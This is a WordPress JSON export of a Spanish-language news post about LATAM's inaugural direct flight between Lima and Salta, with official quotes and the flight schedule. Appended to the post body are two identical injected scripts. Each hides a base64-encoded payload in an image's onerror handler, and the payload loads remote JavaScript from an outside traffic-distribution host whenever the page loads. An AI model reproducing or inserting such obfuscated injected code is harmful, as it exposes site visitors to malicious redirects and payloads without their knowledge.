{"id":3381,"date":"2023-12-04T16:38:05","date_gmt":"2023-12-04T19:38:05","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3381"},"modified":"2025-08-14T00:04:07","modified_gmt":"2025-08-14T03:04:07","slug":"vuelo-lima-salta-latam-realizo-su-vuelo-directo-inaugural","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3381","title":{"rendered":"Vuelo Lima \u2013 Salta: Latam realiz\u00f3 su vuelo directo inaugural"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#85122f\"><em>El servicio operado por Latam, tendr\u00e1 tres frecuencias semanales y abre nuevas oportunidades que incrementen el arribo de turistas de todo el mundo<\/em>.<\/h3>\n\n\n\n<p>La pol\u00edtica de turismo de estado que lleva adelante el Gobierno de la Provincia de Salta suma a la intensa conectividad salte\u00f1a el vuelo con Per\u00fa operado por LATAM Airlines que inici\u00f3 el&nbsp;s\u00e1bado 2 de diciembre con pasajeros provenientes de Lima.<\/p>\n\n\n\n<p>\u201cEl crecimiento tur\u00edstico de Salta de la mano del Plan Liderar promueve pol\u00edticas activas para el incremento del turismo y la concreci\u00f3n de esta ruta a\u00e9rea, implica mayor cantidad de turistas y m\u00e1s trabajo para los salte\u00f1os\u201d, afirm\u00f3 el&nbsp; Gobernador de Salta,&nbsp;<strong>Gustavo<\/strong>&nbsp;<strong>S\u00e1enz<\/strong>.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/10058-vuelo-lima-salta-latam-realizo-su-vuelo-directo-inaugural-20231202121217.jpg\"><img fetchpriority=\"high\" decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/10058-vuelo-lima-salta-latam-realizo-su-vuelo-directo-inaugural-20231202121217.jpg\" alt=\"Vuelo Lima \u2013 Salta: Latam realiz\u00f3 su vuelo directo inaugural\" width=\"272\" height=\"409\"\/><\/a><\/figure><\/div>\n\n\n<p>Por su parte, el ministro de Turismo y Deportes de Salta Mario Pe\u00f1a destac\u00f3 que desde Lima podr\u00e1n ingresar a la provincia turistas de diferentes naciones, sumando rutas y poniendo a&nbsp; Salta en un lugar de expectativa para el turismo internacional, adem\u00e1s de consolidarse como una puerta de ingreso al pa\u00eds en el Norte.<\/p>\n\n\n\n<p>En el aeropuerto Mart\u00edn Miguel de G\u00fcemes, el Gobierno de Salta realiz\u00f3 una recepci\u00f3n del vuelo y un agasajo para los pasajeros que llegaron a Salta desde Lima, con la presencia de la presidenta del Instituto de Promoci\u00f3n Tur\u00edstica, Manuela Arancibia junto a personal y directivos de Latam.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/10059-vuelo-lima-salta-latam-realizo-su-vuelo-directo-inaugural.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/10059-vuelo-lima-salta-latam-realizo-su-vuelo-directo-inaugural.jpg\" alt=\"Vuelo Lima \u2013 Salta: Latam realiz\u00f3 su vuelo directo inaugural\" width=\"299\" height=\"199\"\/><\/a><\/figure><\/div>\n\n\n<p>En tanto, la gerente Comercial de la empresa, Florencia Scardaccione;&nbsp; indic\u00f3 : \u201cEstamos muy contentos de poder concretar la reapertura de esta ruta tan importante para el norte argentino que, no s\u00f3lo nos permite brindar una mejor propuesta de servicio para nuestros pasajeros sino que adem\u00e1s beneficia a las econom\u00edas regionales y potencia a nuestro pa\u00eds en el exterior. Es un orgullo para m\u00ed, poder ser parte de este nuevo hito junto a todos los que formamos parte de LATAM en Argentina\u201d.&nbsp;<\/p>\n\n\n\n<p>La compa\u00f1\u00eda tendr\u00e1 tres frecuencias a la semana; desde Lima hacia Salta el vuelo LA2436 lo har\u00e1 los d\u00edas mi\u00e9rcoles, viernes y s\u00e1bados a las 23.55 hs; mientras que el LA2437 volar\u00e1 a las 5.55 desde Salta a Lima, los jueves, s\u00e1bados y domingos.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/10060-vuelo-lima-salta-latam-realizo-su-vuelo-directo-inaugural.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/10060-vuelo-lima-salta-latam-realizo-su-vuelo-directo-inaugural.jpg\" alt=\"Vuelo Lima \u2013 Salta: Latam realiz\u00f3 su vuelo directo inaugural\" width=\"274\" height=\"183\"\/><\/a><\/figure><\/div>\n\n\n<p><strong>Hub<\/strong>&nbsp;<strong>regionales<\/strong><\/p>\n\n\n\n<p>Salta con este vuelo y el que opera desde 2022 con San Pablo, Brasil, tiene conexi\u00f3n directa con los hub m\u00e1s importantes de Am\u00e9rica del Sur, adem\u00e1s, con las obras en el aeropuerto Mart\u00edn Miguel de G\u00fcemes y con la reducci\u00f3n de la tasa aeroportuaria, abrir\u00e1 oportunidades de gestionar m\u00e1s vuelos regionales<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"900\" height=\"600\" data-id=\"3382\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/12\/5430-vuelo-lima-salta-latam-realizo-su-vuelo-directo-inaugural.jpg\" alt=\"\" class=\"wp-image-3382\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/12\/5430-vuelo-lima-salta-latam-realizo-su-vuelo-directo-inaugural.jpg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/12\/5430-vuelo-lima-salta-latam-realizo-su-vuelo-directo-inaugural-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/12\/5430-vuelo-lima-salta-latam-realizo-su-vuelo-directo-inaugural-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/12\/5430-vuelo-lima-salta-latam-realizo-su-vuelo-directo-inaugural-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/12\/5430-vuelo-lima-salta-latam-realizo-su-vuelo-directo-inaugural-630x420.jpg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"399\" height=\"600\" data-id=\"3383\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/12\/5431-vuelo-lima-salta-latam-realizo-su-vuelo-directo-inaugural.jpg\" alt=\"\" class=\"wp-image-3383\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/12\/5431-vuelo-lima-salta-latam-realizo-su-vuelo-directo-inaugural.jpg 399w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/12\/5431-vuelo-lima-salta-latam-realizo-su-vuelo-directo-inaugural-200x300.jpg 200w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/12\/5431-vuelo-lima-salta-latam-realizo-su-vuelo-directo-inaugural-279x420.jpg 279w\" sizes=\"(max-width: 399px) 100vw, 399px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"560\" height=\"842\" data-id=\"3384\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/12\/5432-vuelo-lima-salta-latam-realizo-su-vuelo-directo-inaugural.jpg\" alt=\"\" class=\"wp-image-3384\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/12\/5432-vuelo-lima-salta-latam-realizo-su-vuelo-directo-inaugural.jpg 560w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/12\/5432-vuelo-lima-salta-latam-realizo-su-vuelo-directo-inaugural-200x300.jpg 200w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/12\/5432-vuelo-lima-salta-latam-realizo-su-vuelo-directo-inaugural-279x420.jpg 279w\" sizes=\"(max-width: 560px) 100vw, 560px\" \/><\/figure>\n<\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El servicio operado por Latam, tendr\u00e1 tres frecuencias semanales y abre nuevas oportunidades que incrementen el arribo de turistas de todo el mundo. La pol\u00edtica de turismo de estado que lleva adelante el Gobierno de la Provincia de Salta suma a la intensa conectividad salte\u00f1a el vuelo con Per\u00fa operado por LATAM Airlines que inici\u00f3 [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3385,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[5],"tags":[],"class_list":{"0":"post-3381","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-buses-y-aeropuertos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3381"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3381"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3381\/revisions"}],"predecessor-version":[{"id":6902,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3381\/revisions\/6902"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3385"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3381"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3381"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3381"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}